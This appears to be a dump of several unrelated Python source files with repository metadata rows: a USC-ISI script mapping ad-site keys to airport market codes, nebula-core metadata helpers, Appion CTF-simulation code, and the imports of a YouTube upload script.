("Huntsville", "Texas"): "UTS",
("Indianapolis", "Indiana"): "IND",
("Inland Empire", "California"): "ONT",
("Iowa City", "Iowa"): "IOW",
("Ithaca", "New York"): "ITH",
("Jacksonville", "Florida"): "JAX",
("Jackson", "Mississippi"): "JAN",
("Janesville", "Wisconsin"): "JVL",
("Jersey Shore", "New Jersey"): "ACY",
("Jonesboro", "Arkansas"): "JBR",
("Joplin", "Missouri"): "JLN",
("Kalamazoo", "Michigan"): "AZO",
("Kamloops", "British Columbia"): "YKA",
("Kansas City", "Missouri"): "MCI",
("Kauai", "Hawaii"): "LIH",
("Kelowna", "British Columbia"): "YLW",
("Keys", "Florida"): "EYW",
("Killeen", "Texas"): "GRK",
("Kingston", "Ontario"): "YGK",
("Kirksville", "Missouri"): "IRK",
("Kitchener", "Ontario"): "YKF",
("Knoxville", "Tennessee"): "TYS",
("Kokomo", "Indiana"): "OKK",
("La Crosse", "Wisconsin"): "LSE",
("LaSalle", "Illinois"): "VYS",
("Lafayette", "Louisiana"): "LFT",
("Lake Charles", "Louisiana"): "LCH",
("Lake Of The Ozarks", "Missouri"): "AIZ",
("Lakeland", "Florida"): "LAL",
("Lancaster", "Pennsylvania"): "LNS",
("Lansing", "Michigan"): "LAN",
("Laredo", "Texas"): "LRD",
("Las Vegas", "Nevada"): "LAS",
("Lawrence", "Kansas"): "LWC",
("Lawton", "Oklahoma"): "LAW",
("Leeds", "Uk"): "LBA",
("Lethbridge", "Alberta"): "YQL",
("Lewiston", "Idaho"): "LWS",
("Lexington", "Kentucky"): "LEX",
("Lima", "Ohio"): "AOH",
("Little Rock", "Arkansas"): "LIT",
("Liverpool", "Uk"): "LPL",
("Logan", "Utah"): "LGU",
("London", "Ontario"): "YXU",
("London", "Uk"): "LHR",
("Long Beach", "California"): "LGB",
("Los Angeles", "California"): "LAX",
("Louisville", "Kentucky"): "SDF",
("Lubbock", "Texas"): "LBB",
("Lynchburg", "Virginia"): "LYH",
("Macon", "Georgia"): "MCN",
("Madison", "Wisconsin"): "MSN",
("Manchester", "New Hampshire"): "MHT",
("Manchester", "Uk"): "MAN",
("Manhattan", "Kansas"): "MHK",
("Mankato", "Minnesota"): "MKT",
("Mansfield", "Ohio"): "MFD",
("Martinsburg", "West Virginia"): "MRB",
("Mason City", "Iowa"): "MCW",
("Mattoon", "Illinois"): "MTO",
("Maui", "Hawaii"): "OGG",
("Mcallen", "Texas"): "MFE",
("Meadville", "Pennsylvania"): "GKJ",
("Medford", "Oregon"): "MFR",
("Melbourne", "Australia"): "MEL",
("Memphis", "Tennessee"): "MEM",
("Mendocino", "California"): "UKI",
("Merced", "California"): "MCE",
("Meridian", "Mississippi"): "MEI",
("Miami", "Florida"): "MIA",
("Milwaukee", "Wisconsin"): "MKE",
("Mobile", "Alabama"): "MOB",
("Modesto", "California"): "MOD",
("Mohave", "Arizona"): "IFP",
("Monroe", "Michigan"): "TTF",
("Monterey", "California"): "MRY",
("Montgomery", "Alabama"): "MGM",
("Montreal", "Quebec"): "YUL",
("Morgantown", "West Virginia"): "MGW",
("Moses Lake", "Washington"): "MWH",
("Muncie", "Indiana"): "MIE",
("Muskegon", "Michigan"): "MKG",
("Myrtle Beach", "South Carolina"): "MYR",
("Nanaimo", "British Columbia"): "YCD",
("Nashville", "Tennessee"): "BNA",
("Natchez", "Mississippi"): "HEZ",
("New Haven", "Connecticut"): "HVN",
("New Orleans", "Louisiana"): "MSY",
("New York", "New York"): "JFK",
("Newcastle", "Uk"): "NCL",
("Newport News", "Virginia"): "ORF",
("Niagara", "Ontario"): "YCM",
("Norfolk", "Virginia"): "ORF",
("North Jersey", "New Jersey"): "EWR",
("North Platte", "Nebraska"): "LBF",
("Northern Michigan", "Michigan"): "TVC",
("Northern Mississippi", "Mississippi"): "TUP",
("Northern Virginia", "district of columbia"): "IAD",
("Northwest Connecticut", "Connecticut"): "DXR",
("Northwest Georgia", "Georgia"): "RMG",
("Ocala", "Florida"): "OCF",
("Odessa", "Texas"): "MAF",
("Ogden", "Utah"): "OGD",
("Oklahoma City", "Oklahoma"): "OKC",
("Olympia", "Washington"): "TCM",
("Omaha", "Nebraska"): "OMA",
("Oneonta", "New York"): "ONH",
("Orange County", "California"): "SNA",
("Oregon Coast", "Oregon"): "ONP",
("Orlando", "Florida"): "MCO",
("Ottawa", "Ontario"): "YOW",
("Ottumwa", "Iowa"): "OTM",
("Outer Banks", "North Carolina"): "FFA",
("Owen Sound", "Ontario"): "YOS",
("Owensboro", "Kentucky"): "OWB",
("Oxford", "Uk"): "OXF",
("Palmdale", "California"): "PMD",
("Palms Prings", "California"): "PSP",
("Panama City", "Florida"): "PFN",
("Parkersburg", "West Virginia"): "PKB",
("Pennstate", "Pennsylvania"): "UNV",
("Pensacola", "Florida"): "PNS",
("Peoria", "Illinois"): "PIA",
("Perth", "Australia"): "PER",
("Peterborough", "Ontario"): "YPQ",
("Philadelphia", "Pennsylvania"): "PHL",
("Phoenix", "Arizona"): "PHX",
("Pittsburgh", "Pennsylvania"): "PIT",
("Plattsburgh", "New York"): "PBG",
("Poconos", "Pennsylvania"): "MPO",
("Port Huron", "Michigan"): "PHN",
("Portland", "Oregon"): "PDX",
("Portsmouth", "Maine"): "PWM",
("Portsmouth", "Virginia"): "ORF",
("Potsdam", "New York"): "MSS",
("Prescott", "Arizona"): "PRC",
("Prince George", "British Columbia"): "YXS",
("Provo", "Utah"): "PVU",
("Pueblo", "Colorado"): "PUB",
("Puerto Rico", "Puerto Rico"): "SJU",
("Pullman", "Washington"): "PUW",
("Quad Cities", "Iowa"): "MLI",
("Quebec", "Quebec"): "YQB",
("Quincy", "Illinois"): "UIN",
("Racine", "Wisconsin"): "RAC",
("Raleigh", "North Carolina"): "RDU",
("Reading", "Pennsylvania"): "RDG",
("Red Deer", "Alberta"): "YQF",
("Redding", "California"): "RDD",
("Reno", "Nevada"): "RNO",
("Richmond", "Virginia"): "RIC",
("Riverside", "California"): "ONT",
("Roanoke", "Virginia"): "ROA",
("Rochester", "New York"): "ROC",
("Rockford", "Illinois"): "RFD",
("Rockies", "Colorado"): "EGE",
("Roseburg", "Oregon"): "RBG",
("ST. Augustine", "Florida"): "UST",
("Sacramento", "California"): "SMF",
("Saginaw", "Michigan"): "MBS",
("Salem", "North Carolina"): "INT",
("Salem", "Oregon"): "SLE",
("Salt Lake City", "Utah"): "SLC",
("San Antonio", "Texas"): "SAT",
("San Bernardino", "California"): "ONT",
("San Diego", "California"): "SAN",
("San Fernando", "California"): "BUR",
("San Francisco", "California"): "SFO",
("San Jose", "California"): "SJC",
("San Luis Obispo", "California"): "SBP",
("San Marcos", "Texas"): "HYI",
("Sandusky", "Ohio"): "SKY",
("Santa Barbara", "California"): "SBA",
("Santa Cruz", "California"): "WVI",
("Santa Maria", "California"): "SMX",
("Santafe", "New Mexico"): "SAF",
("Sarasota", "Florida"): "SRQ",
("Sarnia", "Ontario"): "YZR",
("Saskatoon", "Saskatchewan"): "YXE",
("Sault", "Ontario"): "YAM",
("Savannah", "Georgia"): "SAV",
("Scotts Bluff", "Nebraska"): "BFF",
("Scranton", "Pennsylvania"): "AVP",
("Seattle", "Washington"): "SEA",
("Sheboygan", "Wisconsin"): "SBM",
("Sheffield", "Uk"): "DSA",
("Shoals", "Alabama"): "MSL",
("Showlow", "Arizona"): "SOW",
("Shreveport", "Louisiana"): "SHV",
("Sierra Vista", "Arizona"): "FHU",
("Sioux City", "Iowa"): "SUX",
("Siskiyou", "California"): "SIY",
("Skeena", "British Columbia"): "YYD",
("South Bend", "Indiana"): "SBN",
("South Coast", "Massachusetts"): "EWB",
("South Jersey", "New Jersey"): "MIV",
("Southeast Missouri", "Missouri"): "CGI",
("Southern Maryland", "district of columbia"): "2W6",
("Southwest Michigan", "Michigan"): "BEH",
("Southwest Virginia", "Virginia"): "MKJ",
("Space Coast", "Florida"): "TIX",
("Spokane", "Washington"): "GEG",
("Springfield", "Massachusetts"): "CEF",
("Springfield", "Missouri"): "SGF",
("St Cloud", "Minnesota"): "STC",
("St George", "Utah"): "SGU",
("St Joseph", "Missouri"): "STJ",
("St Louis", "Missouri"): "STL",
("St Paul", "Minnesota"): "MSP",
("Statesboro", "Georgia"): "TBR",
("Stillwater", "Oklahoma"): "SWO",
("Sudbury", "Ontario"): "YSB",
("Suffolk", "Virginia"): "ORF",
("Sunshine", "British Columbia"): "YHS",
("Susanville", "California"): "SVE",
("Sydney", "Australia"): "SYD",
("Syracuse", "New York"): "SYR",
("Tacoma", "Washington"): "TCM",
("Tallahassee", "Florida"): "TLH",
("Tampa", "Florida"): "TPA",
("Terre Haute", "Indiana"): "HUF",
("Texarkana", "Texas"): "TXK",
("Texoma", "Texas"): "GYI",
("Thunderbay", "Ontario"): "YQT",
("Toledo", "Ohio"): "TOL",
("Topeka", "Kansas"): "FOE",
("Toronto", "Ontario"): "YYZ",
("Treasure Coast", "Florida"): "VRB",
("Tri-cities", "Washington"): "PSC",
("Trois Rivieres", "Quebec"): "YRQ",
("Tucson", "Arizona"): "TUS",
("Tulsa", "Oklahoma"): "TUL",
("Tuscaloosa", "Alabama"): "TCL",
("Tuscarawas", "Ohio"): "PHD",
("Twin Falls", "Idaho"): "TWF",
("Twintiers", "New York"): "OLE",
("Tyler", "Texas"): "TYR",
("Upper Peninsula", "Michigan"): "MQT",
("Utica", "New York"): "UCA",
("Valdosta", "Georgia"): "VLD",
("Vancouver", "British Columbia"): "YVR",
("Ventura", "California"): "OXR",
("Victoria", "British Columbia"): "YYJ",
("Virginia Beach", "Virginia"): "ORF",
("Visalia", "California"): "VIS",
("Waco", "Texas"): "ACT",
("Wales", "Uk"): "CWL",
("Washington DC", "district of columbia"): "IAD",
("Waterloo", "Iowa"): "ALO",
("Watertown", "New York"): "ART",
("Wausau", "Wisconsin"): "AUW",
("Wenatchee", "Washington"): "EAT",
("West Kentucky", "Kentucky"): "PAH",
("West Palm Beach", "Florida"): "PBI",
("West Slope", "Colorado"): "GJT",
("Western Maryland", "Maryland"): "CBE",
("Wheeling", "West Virginia"): "HLG",
("Whistler", "British Columbia"): "YWS",
("Wichita Falls", "Texas"): "SPS",
("Wichita", "Kansas"): "ICT",
("Williamsport", "Pennsylvania"): "IPT",
("Wilmington", "North Carolina"): "ILG",
("Windsor", "Ontario"): "YQG",
("Worcester", "Massachusetts"): "ORH",
("Yakima", "Washington"): "YKM",
("York", "Pennsylvania"): "THV",
("Youngstown", "Ohio"): "YNG",
("Yuma", "Arizona"): "YUM",
("Zanesville", "Ohio"): "ZZV",
("Albany", "Georgia"): "ABY",
("Athens", "Georgia"): "AHN",
("Baton Rouge", "Lousiana"): "BTR",
("Bloomington", "Illinois"): "BMI",
("Columbus", "Georgia"): "CSG",
("Cumberland Valley", "Pennsylvania"): "N68",
("Fayetteville", "Arkansas"): "XNA",
("Jackson", "Michigan"): "JXN",
("Lafayette", "Indiana"): "LAF",
("Lake Charles", "Lousiana"): "LCH",
("Monroe", "Lousiana"): "MLU",
("Monroe", "louisiana"): "MLU",
("New Orleans", "Lousiana"): "MSY",
("Regina", "Saskatchewan"): "YQR",
("Richmond", "Indiana"): "RID",
("Rochester", "Minnesota"): "RST",
("Saguenay", "Quebec"): "YBG",
("Sherbrooke", "Quebec"): "YSC",
("Shreveport", "Lousiana"): "SHV",
("Southern West Virgin", "West Virginia"): "BKW",
("Springfield", "Illinois"): "SPI",
("Victoria", "Texas"): "VCT"}
# escortsinca_sitekey_to_marketid
escortsinca_sitekey_to_marketid = escortadsxxx_sitekey_to_marketid
# escortsintheus_sitekey_to_marketid
escortsintheus_sitekey_to_marketid = escortadsxxx_sitekey_to_marketid
# liveescortreviews_sitekey_to_marketid
liveescortreviews_sitekey_to_marketid = {
"akron": "CAK",
"albany": "ALB",
"albuquerque": "ABQ",
"anchorage": "ANC",
"atlanta": "ATL",
"austin": "AUS",
"baltimore": "BWI",
"batonrouge": "BTR",
"birmingham": "BHM",
"boston": "BOS",
"bronx": "JFK",
"brooklyn": "JFK",
"buffalo": "BUF",
"burlington": "BTV",
"calgary": "YYC",
"centraljersey": "47N",
"charleston": "CHS",
"charlotte": "CLT",
"chattanooga": "CHA",
"chesapeake": "ORF",
"chicago": "ORD",
"cincinnati": "CVG",
"cleveland": "CLE",
"coloradosprings": "COS",
"columbia": "CAE",
"columbus": "CMH",
"daytona": "DAB",
"delaware": "ILG",
"denver": "DEN",
"desmoines": "DSM",
"detroit": "DTW",
"eastbay": "OAK",
"edmonton": "YEG",
"everett": "PAE",
"fairfield": "HVN",
"fortmyers": "RSW",
"ftlauderdale": "FLL",
"greensboro": "GSO",
"greenville": "GSP",
"hamilton": "YHM",
"hartford": "HFD",
"honolulu": "HNL",
"houston": "IAH",
"hudsonvalley": "SWF",
"huntsville": "HSV",
"indianapolis": "IND",
"inlandempire": "ONT",
"jacksonville": "JAX",
"jerseyshore": "ACY",
"kc": "MCI",
"knoxville": "TYS",
"lasvegas": "LAS",
"lexington": "LEX",
"littlerock": "LIT",
"longbeach": "LGB",
"longisland": "ISP",
"losangeles": "LAX",
"louisville": "SDF",
"madison": "MSN",
"maine": "PWM",
"manhattan": "JFK",
"memphis": "MEM",
"miami": "MIA",
"milwaukee": "MKE",
"minneapolis": "MSP",
"minot": "MOT",
"montreal": "YUL",
"myrtlebeach": "MYR",
"nashville": "BNA",
"newhampshire": "MHT",
"newhaven": "HVN",
"newlondon": "GON",
"neworleans": "MSY",
"norfolk": "ORF",
"northbay": "STS",
"northeasttexas": "DFW",
"northjersey": "EWR",
"nova": "IAD",
"oklahomacity": "OKC",
"omaha": "OMA",
"orangecounty": "SNA",
"orlando": "MCO",
"ottawa": "YOW",
"palmdale": "PMD",
"palmsprings": "PSP",
"panamacity": "PFN",
"pensacola": "PNS",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"portland": "PDX",
"providence": "PVD",
"queens": "JFK",
"raleigh": "RDU",
"reno": "RNO",
"richmond": "RIC",
"sacramento": "SMF",
"saltlakecity": "SLC",
"sanantonio": "SAT",
"sandiego": "SAN",
"sanfernandovalley": "BUR",
"sangabrielvalley": "EMT",
"sanjose": "SJC",
"santabarbara": "SBA",
"sarasota": "SRQ",
"saskatoon": "YXE",
"seattle": "SEA",
"sf": "SFO",
"southbend": "SBN",
"southcoast": "EWB",
"southernmaryland": "2W6",
"southjersey": "MIV",
"spacecoast": "TIX",
"statenisland": "JFK",
"stlouis": "STL",
"syracuse": "SYR",
"tacoma": "TCM",
"tampa": "TPA",
"toronto": "YYZ",
"tucson": "TUS",
"tulsa": "TUL",
"vancouver": "YVR",
"ventura": "OXR",
"virginiabeach": "ORF",
"washingtondc": "IAD",
"westchester": "HPN",
"westpalmbeach": "PBI",
"westvirginia": "CRW",
"wichita": "ICT",
"winnipeg": "YWG",
"worcester": "ORH"}
l = []
# url
for k,v in backpage_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/backpage/%s' % (k), 'http://dig.isi.edu/market/%s' % v])
# url
for k,v in craigslist_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/craigslist/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# url
for k,v in classivox_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/classivox/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# url
for k,v in myproviderguide_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/myproviderguide/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# 1,2,or3-tuple: from url
for k,v in naughtyreviews_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/naughtyreviews/%s' % ('/'.join(k)), 'http://dig.isi.edu/market/%s' %v])
# url
for k,v in cityvibe_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/cityvibe/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# "city, state" string: from title
for k,v in escortsincollege_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/escortsincollege/%s' % (k.replace(',','/').replace(' ','')), 'http://dig.isi.edu/market/%s' %v])
# "city, state" string: from title
for k,v in escortphonelist_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/escortphonelist/%s' % (k.replace(',','/').replace(' ','')), 'http://dig.isi.edu/market/%s' %v])
# url
for k,v in eroticmugshots_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/eroticmugshots/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# url
for k,v in massagetroll_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/eroticmugshots/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
# ('City', 'State') 2-tuple: from columns city, state
for k,v in escortadsxxx_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/escortadsxxx/%s/%s' % (k[0].replace(' ',''), k[1].replace(' ','')), 'http://dig.isi.edu/market/%s' %v])
# ('City', 'State') 2-tuple: from columns city, state
for k,v in escortsinca_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/escortsinca/%s/%s' % (k[0].replace(' ',''), k[1].replace(' ','')), 'http://dig.isi.edu/market/%s' %v])
# ('City', 'State') 2-tuple: from columns city, state
for k,v in escortsintheus_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/escortsintheus/%s/%s' % (k[0].replace(' ',''), k[1].replace(' ','')), 'http://dig.isi.edu/market/%s' %v])
# url sitekey
for k,v in liveescortreviews_sitekey_to_marketid.iteritems():
l.append(['http://dig.isi.edu/sourcemarket/liveescortreviews/%s' % (k), 'http://dig.isi.edu/market/%s' %v])
import json
with open('sitekeymappings2.json', 'w') as f:
print >> f, '['
k = len(l)
for row in l:
sourcemarket_uri = row[0]
print type(sourcemarket_uri)
market_uri = row[1]
d = {'sourcemarket_uri': sourcemarket_uri,
'market_uri': market_uri}
json.dump(d, f, indent=4)
k -= 1
if k>0:
print >> f, ","
else:
print >> f
print >> f, ']'
| usc-isi-i2/dig-alignment | versions/1.0/datasets/istr/market/sourcemarket.py | Python | apache-2.0 | 249,792 | [
"COLUMBUS"
] | 6d3567468c987f1369893fff957ad0294f28956b40e6d9cfdfd272c1a11aaa7a |
import re
from nxtools import *
from .common import *
def shorten(instr, nlen):
line = instr.split("\n")[0]
if len(line) < 100:
return line
return line[:nlen] + "..."
def filter_match(f, r):
"""OR"""
if type(f) in [list, tuple]:
res = False
for fl in f:
if re.match(fl, r):
return True
return False
else:
return re.match(f, r)
def tree_indent(data):
has_children = False
for i, row in enumerate(data):
value = row["value"]
depth = len(value.split("."))
parentindex = None
for j in range(i - 1, -1, -1):
if value.startswith(data[j]["value"] + "."):
parentindex = j
data[j]["has_children"] = True
break
if parentindex is None:
data[i]["indent"] = 0
continue
has_children = True
data[i]["indent"] = data[parentindex]["indent"] + 1
for i, row in enumerate(data):
role = row.get("role", "option")
if role in ["label", "hidden"]:
continue
elif has_children and row.get("has_children"):
data[i]["role"] = "header"
else:
data[i]["role"] = "option"
#
# CS Caching
#
class CachedObject(type):
_cache = None
@classmethod
def clear_cache(cls):
cls._cache = None
def __call__(cls, *args):
if not cls._cache:
cls._cache = {}
key = tuple(args)
if key not in cls._cache:
cls._cache[key] = super().__call__(*args)
return cls._cache[key]
# Moved to metadata, but this stub needs to live here so older firefly
# doesn't break.
def clear_cs_cache():
from . import metadata
metadata.clear_cs_cache()
| immstudios/nebula-core | nebulacore/meta_utils.py | Python | gpl-3.0 | 1,789 | [
"Firefly"
] | 5a2aeecdac7ae3aba2a96ecbaf89f95ced9dcb283ff3fe568177f1285e6e1e85 |
#!/usr/bin/env python
import time
import math
import numpy
from appionlib import apDisplay
from appionlib.apCtf import ctftools
debug = False
#===================
def generateCTF1d(radii=None, focus=1.0e-6, cs=2e-3, volts=120000, ampconst=0.07,
failParams=False, overfocus=False):
"""
calculates a CTF function based on the input details
Use SI units: meters, radians, volts
Underfocus is postive (defocused)
"""
if debug is True:
print "generateCTF1dFromRadii()"
if radii is None:
radii = generateRadii1d(numpoints=256, pixelsize=1e-10)
if debug is True:
apDisplay.printColor("generateCTF radii: 1/%.2fA --> 1/%.2fA"%(1/radii[1]*1e10, 1/radii[-1]*1e10), "cyan")
t0 = time.time()
checkParams(focus1=focus, focus2=focus, cs=cs, volts=volts, ampconst=ampconst, failParams=failParams)
lamb = ctftools.getTEMLambda(volts)
s = radii
pi = math.pi
if overfocus is True:
focus = -1.0*focus
gamma = -0.5*pi*cs*(lamb**3)*(s**4) + pi*focus*lamb*(s**2)
if overfocus is True:
gamma = -1.0*gamma
A = ampconst
B = math.sqrt(1.0 - ampconst**2)
prectf = A*numpy.cos(gamma) + B*numpy.sin(gamma)
ctf = prectf**2
if debug is True:
print "generate 1D ctf complete in %.9f sec"%(time.time()-t0)
return ctf
#===================
def getDiffResForOverfocus(radii=None, cs=2e-3, volts=120000):
"""
given Cs and kV, determine the initial resolution where the difference between
overfocus and underfocus is clearly visible.
value returned in Angstroms, but radii must be in meters
"""
if debug is True:
print "getDiffResForOverfocus()"
if debug is True:
apDisplay.printColor("getDiffRes radii: 1/%.2fA --> 1/%.2fA"%(1/radii[1]*1e10, 1/radii[-1]*1e10), "cyan")
t0 = time.time()
checkParams(focus1=1.0e-6, focus2=1.0e-6, cs=cs, volts=volts, ampconst=0.0, failParams=False)
lamb = ctftools.getTEMLambda(volts)
s = radii
pi = math.pi
csgamma = 2*pi*0.25*cs*(lamb**3)*(s**4)
#over/under-focus difference is visible when Cs component is greater than 0.05
index = numpy.searchsorted(csgamma, 0.03)
diffres = 1.0/radii[index-1]*1e10
apDisplay.printColor("Overfocus/Underfocus difference resolution is: 1/%.2fA"%(diffres), "cyan")
if debug is True:
print "difference resolution complete in %.9f sec"%(time.time()-t0)
return diffres
#===================
def generateCTF1dACE2(radii=None, focus=1.0e-6, cs=2e-3, volts=120000, ampconst=0.07, failParams=False):
"""
calculates a CTF function based on the input details
Use SI units: meters, radians, volts
Underfocus is postive (defocused)
"""
if debug is True:
print "generateCTF1dFromRadii()"
t0 = time.time()
checkParams(focus1=focus, focus2=focus, cs=cs, volts=volts, ampconst=ampconst, failParams=failParams)
minres = 1e10/radii.min()
maxres = 1e10/radii.max()
if debug is True:
print "** CTF limits %.1f A -->> %.1fA"%(minres, maxres)
if maxres < 2.0 or maxres > 50.0:
apDisplay.printError("CTF limits are incorrect %.1f A -->> %.1fA"%(minres, maxres))
wavelength = ctftools.getTEMLambda(volts)
x4 = math.pi/2.0 * wavelength**3 * cs
x2 = math.pi * wavelength
x0 = 1.0*math.asin(ampconst) #CORRECT
if debug is True:
print "x0 shift %.1f degrees"%(math.degrees(x0))
radiisq = radii**2
gamma = (x4 * radiisq**2) + (-focus * x2 * radiisq) + (x0)
#ctf = -1.0*numpy.cos(gamma) #WRONG
#ctf = -1.0*numpy.sin(gamma) #CORRECT
ctf = 1.0*numpy.sin(gamma) #MAYBE CORRECT
if debug is True:
print "generate 1D ctf complete in %.9f sec"%(time.time()-t0)
return ctf**2
#===================
def generateCTF1dMakePoints(numpoints=256, focus=1.0e-6,
pixelsize=1.5e-10, cs=2e-3, volts=120000, ampconst=0.07):
"""
calculates a CTF function based on the input details
Use SI units: meters, radians, volts
Underfocus is postive (defocused)
"""
if debug is True:
print "generateCTF1d()"
checkParams(focus1=focus, focus2=focus, pixelsize=pixelsize, cs=cs,
volts=volts, ampconst=ampconst)
radii = generateRadii1d(numpoints, pixelsize)
ctf = generateCTF1dFromRadii(radii, focus, cs, volts, ampconst)
return ctf
#===================
def generateRadii1d(numpoints=256, pixelsize=1e-10):
radfreq = 1.0/( numpoints*pixelsize )
radii = numpy.arange(numpoints) * radfreq
return radii
#===================
def generateCTF2d(focus1=-1.0e-6, focus2=-1.0e-6, theta=0.0,
shape=(256,256), pixelsize=1.0e-10, cs=2e-3, volts=120000, ampconst=0.000):
"""
calculates a CTF function based on the input details
Use SI units: meters, radians, volts
Underfocus is postive (defocused)
"""
t0 = time.time()
wavelength = getTEMLambda(volts)
xfreq = 1.0/( (shape[1]-1)*2.*pixelsize )
yfreq = 1.0/( (shape[0]-1)*2.*pixelsize )
ctf = numpy.zeros(shape, dtype=numpy.float64)
meanfocus = (focus1 + focus2) / 2.
focusdiff = (focus1 - focus2) / 2.
t1 = math.pi * wavelength
t2 = wavelength**2 * cs / 2.0
t3 = -1.0*math.asin(ampconst)
radiisq = circle.generateRadial1d(shape, xfreq, yfreq)
angles = -circle.generateAngular2d(shape, xfreq, yfreq)
localfocus = meanfocus + focusdiff * numpy.cos(2.0*(angles-theta))
gamma = t1*radiisq * (-localfocus + t2*radiisq) + t3
ctf = numpy.sin(gamma)
gauss = circle.generateGaussion2d(shape)
imagefile.arrayToJpeg(gauss, "gauss2.jpg")
if debug is True:
print "generate ctf 2d complete in %.4f sec"%(time.time()-t0)
return ctf*gauss
#===================
def generateAngular2d(shape, xfreq, yfreq):
"""
this method is about 2x faster than method 1
"""
t0 = time.time()
if shape[0] % 2 != 0 or shape[1] % 2 != 0:
apDisplay.printError("array shape for radial function must be even")
halfshape = numpy.array(shape)/2.0
a = Angular(halfshape, xfreq, yfreq, center=False, flip=False)
angular1 = a.angular
b = Angular(halfshape, xfreq, yfreq, center=False, flip=True)
angular2 = numpy.fliplr(b.angular)
circular = numpy.vstack(
(numpy.hstack(
(numpy.flipud(angular2), -numpy.flipud(angular1))
),numpy.hstack(
(-angular2, angular1),
)))
### raw radius from center
#print numpy.around(circular*180/math.pi,1)
print "angular 2 complete in %.4f sec"%(time.time()-t0)
return circular
#===================
def generateGaussion2d(shape, sigma=None):
"""
this method is about 4x faster than method 1
"""
t0 = time.time()
if sigma is None:
sigma = numpy.mean(shape)/4.0
circular = generateRadial2(shape)
circular = numpy.exp(-circular/sigma**2)
print "gaussian 2 complete in %.4f sec"%(time.time()-t0)
return circular
#===================
class Radial(object):
def __init__(self, shape, xfreq=1.0, yfreq=1.0, center=True):
# setup
if center is True:
### distance from center
self.center = numpy.array(shape, dtype=numpy.float64)/2.0 - 0.5
else:
### the upper-left edge
self.center = (-0.5, -0.5)
self.xfreqsq = xfreq**2
self.yfreqsq = yfreq**2
# function
self.radial = numpy.fromfunction(self.distance, shape, dtype=numpy.float64)
def distance(self, y, x):
distance = (
(x - self.center[1])**2 * self.xfreqsq
+ (y - self.center[0])**2 * self.yfreqsq
)
return distance
#===================
def generateRadial2d(shape, xfreq, yfreq):
"""
this method is about 4x faster than method 1
"""
t0 = time.time()
if shape[0] % 2 != 0 or shape[1] % 2 != 0:
apDisplay.printError("array shape for radial function must be even")
halfshape = numpy.array(shape)/2.0
#radial = numpy.fromfunction(radiusfunc, halfshape)
r = Radial(halfshape, xfreq, yfreq, center=False)
radial = r.radial
circular = numpy.vstack(
(numpy.hstack(
(numpy.fliplr(numpy.flipud(radial)), numpy.flipud(radial))
),numpy.hstack(
(numpy.fliplr(radial), radial),
)))
### raw radius from center
#print circular
print "radial 2 complete in %.4f sec"%(time.time()-t0)
return circular
#===================
def checkParams(focus1=-1.0e-6, focus2=-1.0e-6, pixelsize=1.5e-10,
cs=2e-3, volts=120000, ampconst=0.07, failParams=False):
if debug is True:
print " Defocus1 %.2f microns (underfocus is positive)"%(focus1*1e6)
if focus1 != focus2:
print " Defocus2 %.2f microns (underfocus is positive)"%(focus2*1e6)
print " Pixelsize %.3f Angstroms"%(pixelsize*1e10)
print " C_s %.1f mm"%(cs*1e3)
print " High tension %.1f kV"%(volts*1e-3)
print (" Amp Contrast %.3f (shift %.1f degrees)"
%(ampconst, math.degrees(-math.asin(ampconst))))
if focus1*1e6 > 15.0 or focus1*1e6 < 0.1:
msg = "atypical defocus #1 value %.1f microns (underfocus is positve)"%(focus1*1e6)
if failParams is False:
apDisplay.printWarning(msg)
else:
apDisplay.printError(msg)
if focus2*1e6 > 15.0 or focus2*1e6 < 0.1:
msg = "atypical defocus #2 value %.1f microns (underfocus is positve)"%(focus2*1e6)
if failParams is False:
apDisplay.printWarning(msg)
else:
apDisplay.printError(msg)
if cs*1e3 > 7.0 or cs*1e3 < 0.4:
msg = "atypical C_s value %.1f mm"%(cs*1e3)
if failParams is False:
apDisplay.printWarning(msg)
else:
apDisplay.printError(msg)
if pixelsize*1e10 > 20.0 or pixelsize*1e10 < 0.1:
msg = "atypical pixel size value %.1f Angstroms"%(pixelsize*1e10)
if failParams is False:
apDisplay.printWarning(msg)
else:
apDisplay.printError(msg)
if volts*1e-3 > 400.0 or volts*1e-3 < 60:
msg = "atypical high tension value %.1f kiloVolts"%(volts*1e-3)
if failParams is False:
apDisplay.printWarning(msg)
else:
apDisplay.printError(msg)
if ampconst < 0.0 or ampconst > 0.5:
msg = "atypical amplitude contrast value %.3f"%(ampconst)
if failParams is False:
apDisplay.printWarning(msg)
else:
apDisplay.printError(msg)
return
#===================
#===================
#===================
if __name__ == "__main__":
r = generateRadial2d((8,8), 0.1, 0.1)
radii = generateRadii1d()
ctf = generateCTF1d(radii)
from matplotlib import pyplot
pyplot.plot(radii, ctf, 'r-', )
pyplot.subplots_adjust(wspace=0.05, hspace=0.05,
bottom=0.05, left=0.05, top=0.95, right=0.95, )
pyplot.show()
| vossman/ctfeval | appionlib/apCtf/genctf.py | Python | apache-2.0 | 9,912 | [
"Gaussian"
] | 4b916085627df98592713c7ac508b56d11b8d76334dd27513496955b863b5637 |
#!/usr/bin/python
import httplib
import httplib2
import os
import random
import sys
import time
from apiclient.discovery import build
from apiclient.errors import HttpError
from apiclient.http import MediaFileUpload
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import argparser, run_flow
